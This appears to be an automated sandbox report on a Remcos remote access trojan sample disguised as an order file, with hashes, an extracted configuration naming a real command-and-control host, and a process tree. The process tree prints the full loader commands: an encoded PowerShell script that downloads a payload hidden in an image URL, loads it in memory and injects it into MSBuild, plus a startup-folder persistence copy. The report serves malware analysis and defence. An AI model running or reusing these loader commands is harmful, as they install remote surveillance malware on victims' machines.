remcos | ab347c89d899e16d758c131d8e4510f081c928cca1e9dc1db8e957ed939091ab

General

Target

NewOrder12052024.js
Size

9KB
MD5

efa7decdf2f70cf9e45046a9a040a64e
SHA1

394ffdb90b4f53cf7147d141b43ab2e45c046b31
SHA256

ab347c89d899e16d758c131d8e4510f081c928cca1e9dc1db8e957ed939091ab
SHA512

655b57b69beba0b9dac4ea4466153970341763fff32571c6bc202848bf1cecd19d034c3aaca3b776bf91e9a1b572465619218211c7f71240ae867455f401c4bf
SSDEEP

192:K/4mimlh1w/zm6mGTfibYb0/9mjmkBOJb4f:wjNrIqVoKr0aCOJb4f

Score

10^/10

remcos home discovery execution rat

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Extracted

Family

remcos

Botnet

HOME

C2

jawa123.duckdns.org:9005

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
vlc.exe
copy_folder
vlc
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
keylog_path
%AppData%
mouse_option
false
mutex
net-YA1YXM
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
chorne
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 5 IoCs

flow	pid	Process
3	2844	wscript.exe
6	2844	wscript.exe
8	2844	wscript.exe
23	2328	powershell.exe
29	2328	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
552	powershell.exe
3920	powershell.exe
2328	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	cscript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	cscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	cscript.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2328 set thread context of 4752	2328	powershell.exe	105

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1416	PING.EXE
3148	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1416	PING.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
552	powershell.exe
552	powershell.exe
3920	powershell.exe
3920	powershell.exe
2328	powershell.exe
2328	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4752	MSBuild.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 4612	2844	wscript.exe	83
PID 2844 wrote to memory of 4612	2844	wscript.exe	83
PID 4612 wrote to memory of 3148	4612	cscript.exe	85
PID 4612 wrote to memory of 3148	4612	cscript.exe	85
PID 3148 wrote to memory of 1416	3148	cmd.exe	87
PID 3148 wrote to memory of 1416	3148	cmd.exe	87
PID 3148 wrote to memory of 552	3148	cmd.exe	97
PID 3148 wrote to memory of 552	3148	cmd.exe	97
PID 4612 wrote to memory of 3920	4612	cscript.exe	98
PID 4612 wrote to memory of 3920	4612	cscript.exe	98
PID 3920 wrote to memory of 2328	3920	powershell.exe	100
PID 3920 wrote to memory of 2328	3920	powershell.exe	100
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105
PID 2328 wrote to memory of 4752	2328	powershell.exe	105

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\NewOrder12052024.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\System32\cscript.exe
  "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\octaves.js
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:4612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\octaves.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3148
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 10
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\octaves.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $lyophilizers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABwAG8AcwBzAGUAcwBzAGkAdgBlAG4AZQBzAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABwAHIAZQBvAGMAYwB1AHAAaQBlAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAGQAYQB2AGUAcgBpAG4AZQBzACAAPQAgACQAcAByAGUAbwBjAGMAdQBwAGkAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHAAbwBzAHMAZQBzAHMAaQB2AGUAbgBlAHMAcwApADsAJABuAHkAbQBwAGgAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQBkAGEAdgBlAHIAaQBuAGUAcwApADsAJABsAGUAeABpAGMAYQBsAGkAegBlAHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgB2AG8AeQBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAbABpAHAAZAByAGUAcwBzACAAPQAgACQAbgB5AG0AcABoAHMALgBJAG4AZABlAHgATwBmACgAJABsAGUAeABpAGMAYQBsAGkAegBlAHMAKQA7ACQAdABoAHIAdQBzAGgAZQBzACAAPQAgACQAbgB5AG0AcABoAHMALgBJAG4AZABlAHgATwBmACgAJABlAG4AdgBvAHkAcwApADsAJABzAGwAaQBwAGQAcgBlAHMAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAHQAaAByAHUAcwBoAGUAcwAgAC0AZwB0ACAAJABzAGwAaQBwAGQAcgBlAHMAcwA7ACQAcwBsAGkAcABkAHIAZQBzAHMAIAArAD0AIAAkAGwAZQB4AGkAYwBhAGwAaQB6AGUAcwAuAEwAZQBuAGcAdABoADsAJABmAGUAcgBtAGkAbwBuAHMAIAA9ACAAJAB0AGgAcgB1AHMAaABlAHMAIAAtACAAJABzAGwAaQBwAGQAcgBlAHMAcwA7ACQAZAByAGUAYQBtAGkAZQByACAAPQAgACQAbgB5AG0AcABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwBsAGkAcABkAHIAZQBzAHMALAAgACQAZgBlAHIAbQBpAG8AbgBzACkAOwAkAG8AcgBnAGEAbgBpAHoAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAJABkAHIAZQBhAG0AaQBlAHIALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB9ACkAWwAtADEALgAuAC0AKAAkAGQAcgBlAGEAbQBpAGUAcgAuAEwAZQBuAGcAdABoACkAXQA7ACQAcgBlAGIAYQB0AG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGcAYQBuAGkAegBlAGQAKQA7ACQAZQB0AHkAbQBvAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcgBlAGIAYQB0AG8AKQA7ACQAZQBwAGkAZABvAHQAZQAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGUAcABpAGQAbwB0AGUALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAQAAoACcAMAAvAFgAbwBSAGUAUAAvAHIALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoACcALAAgACcAawBhAGYAdABhAG4AJwAsACAAJwBrAGEAZgB0AGEAbgAnACwAIAAnAGsAYQBmAHQAYQBuACcALAAgACcATQBTAEIAdQBpAGwAZAAnACwAIAAnAGsAYQBmAHQAYQBuACcALAAgACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAMQAnACwAJwBrAGEAZgB0AGEAbgAnACkAKQA7AGkAZgAgACgAJABuAHUAbABsACAALQBuAGUAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAgAC0AYQBuAGQAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABbAHYAbwBpAGQAXQAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAnAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2AGUAcgBzAGkAbwBuACAATgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAnACAAfQA7AGkAZgAgACgAJABuAHUAbABsACAALQBuAGUAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAgAC0AYQBuAGQAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABbAHYAbwBpAGQAXQAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAnAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2AGUAcgBzAGkAbwBuACAATgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAnACAAfQA7AA==';$atones = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($lyophilizers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $atones
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$possessiveness = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$preoccupies = New-Object System.Net.WebClient;$cadaverines = $preoccupies.DownloadData($possessiveness);$nymphs = [System.Text.Encoding]::UTF8.GetString($cadaverines);$lexicalizes = '<<BASE64_START>>';$envoys = '<<BASE64_END>>';$slipdress = $nymphs.IndexOf($lexicalizes);$thrushes = $nymphs.IndexOf($envoys);$slipdress -ge 0 -and $thrushes -gt $slipdress;$slipdress += $lexicalizes.Length;$fermions = $thrushes - $slipdress;$dreamier = $nymphs.Substring($slipdress, $fermions);$organized = -join ($dreamier.ToCharArray() | ForEach-Object { $_ })[-1..-($dreamier.Length)];$rebato = [System.Convert]::FromBase64String($organized);$etymon = [System.Reflection.Assembly]::Load($rebato);$epidote = [dnlib.IO.Home].GetMethod('VAI');$epidote.Invoke($null, @('0/XoReP/r/ee.etsap//:sptth', 'kaftan', 'kaftan', 'kaftan', 'MSBuild', 'kaftan', 'kaftan','kaftan','kaftan','kaftan','kaftan','kaftan','1','kaftan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2328
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c96c8642dc5ced9c1571989b026d7718

SHA1
ba3f2c71aa2ed5e71eb9d682c29f2933608587c0

SHA256
94a206af3a332c647556c6c01fcb59418ab22b4ba4c9f940b3e77e9bd5e537ac

SHA512
142f3f16d51970b13adcd7c9e6c4a015b3201f3076eaa75157feb2ba6b1f1f1990f21626b572dc827c10480869cba7ff0a57474f428c64146ff74200c35504aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjybjo5c.fpu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\octaves.js

Filesize
154KB

MD5
b18f8cdaa68d74bc39dde0852aac7719

SHA1
c747020dd4d40d3a793167a5e3f976696a906b41

SHA256
831f1bb5884bd0e81acd1e01b2d43654488d929e12992a195fb659c582bda2d1

SHA512
5d03cdf4ce423935fe076d4fc2f15541a38d3ce9cdcbe93deeb42aeeeab74128dc9e9f6b2eca2306a88d5778a2aae7e10f6497b7b1251c9ea12c9bd5def2b1bd

Download Submit
C:\Users\Admin\AppData\Roaming\remcos\logs.dat

Filesize
144B

MD5
5d4fa0d885b032d36521bf84fe3d3cb0

SHA1
b02dad04248afe8c84d2d48fbf18038d4ccdb679

SHA256
1cbc104328829334dd841717509f1881dc19b55714d4a87c3fb0efaa0b42140e

SHA512
1f1ead060381e9a380206a2b8d47d7f8d0855512d16c423103d1e8f9dd8c072037769c53874a909b0c0a9031e82b55af2a9be18b4898f5b36825c736f2ae14b3

Download Submit
memory/552-17-0x000001ED312E0000-0x000001ED31302000-memory.dmp

Filesize
136KB

Download
memory/2328-44-0x0000022ED6430000-0x0000022ED6588000-memory.dmp

Filesize
1.3MB

Download
memory/4752-55-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-66-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-53-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-54-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-47-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-56-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-57-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-59-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-45-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-50-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-67-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-74-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-75-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-82-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-83-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-90-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4752-91-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads